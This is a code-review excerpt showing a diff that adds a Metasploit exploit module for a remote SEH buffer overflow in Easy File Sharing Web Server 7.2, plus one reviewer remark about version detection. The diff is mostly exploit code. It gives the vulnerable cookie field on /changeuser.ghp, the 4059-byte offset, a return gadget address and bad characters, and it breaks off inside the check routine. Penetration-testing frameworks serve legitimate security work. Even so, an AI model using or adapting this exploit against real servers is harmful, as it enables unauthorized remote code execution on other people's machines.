modules/exploits/windows/http/easy_file_share

```diff
@@ -0,0 +1,111 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Seh
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'    => 'Easy File Sharing Web Server v7.2 Remote SEH Based Overflow',
+      'Description'  => %q{
+          Easy File Sharing Web Server v7.2 Remote SEH Based Overflow
+          The buffer overwrites ebx with 750+ offset, when sending 4059 it overwrites the EBX
+          vulnerable file /changeuser.ghp > Cookies UserID=[buf]
+          Means there are two ways to exploit changeuser.ghp
+          Tested on Win7 x64 and x86, it should work on win8/win10
+          By Audit0r
+          https://twitter.com/Audit0rSA
+      },
+      'License'    => MSF_LICENSE,
+      'Author'    =>
+        [
+          'superkojiman', # Original discovery
+          'Audit0r - https://twitter.com/Audit0rSA',  
+          'Chris Gabriel',  # MSF Module
+        ],
+      'References'  =>
+        [
+          [ 'OSVDB', '106965' ],
+          [ 'CVE', ' 2014-3791' ],        
+          [ 'URL', 'https://www.exploit-db.com/exploits/33352/' ], 
+          [ 'URL', 'https://www.exploit-db.com/exploits/38526/' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'process', #none/process/thread/seh
+          #'InitialAutoRunScript' => 'migrate -f',
+        },
+      'Platform'  => 'win',
+      'Payload'  =>
+        {
+          'BadChars' => "\x00\x3B",
+          'DisableNops' => true,
+        },
+
+      'Targets'    =>
+        [
+          [ 'EFS 7.2',
+            {
+              'Ret'     =>  0x10017743, # pop eax # pop esi # ret  - ImageLoad.dll
+              'Offset'  =>  4059
+            }
+          ],
+        ],
+      'Privileged'  => false,
+      'DisclosureDate'  => 'Oct 12 2015',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptBool.new('SSL',[false, 'Use SSL', false])
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('/')
+    })
+    if res.to_s.include?('Server: Easy File Sharing Web Server v6.9')
```

Comment:
It would be better to get the `whatsnew.txt` file, since it contains the complete changelog.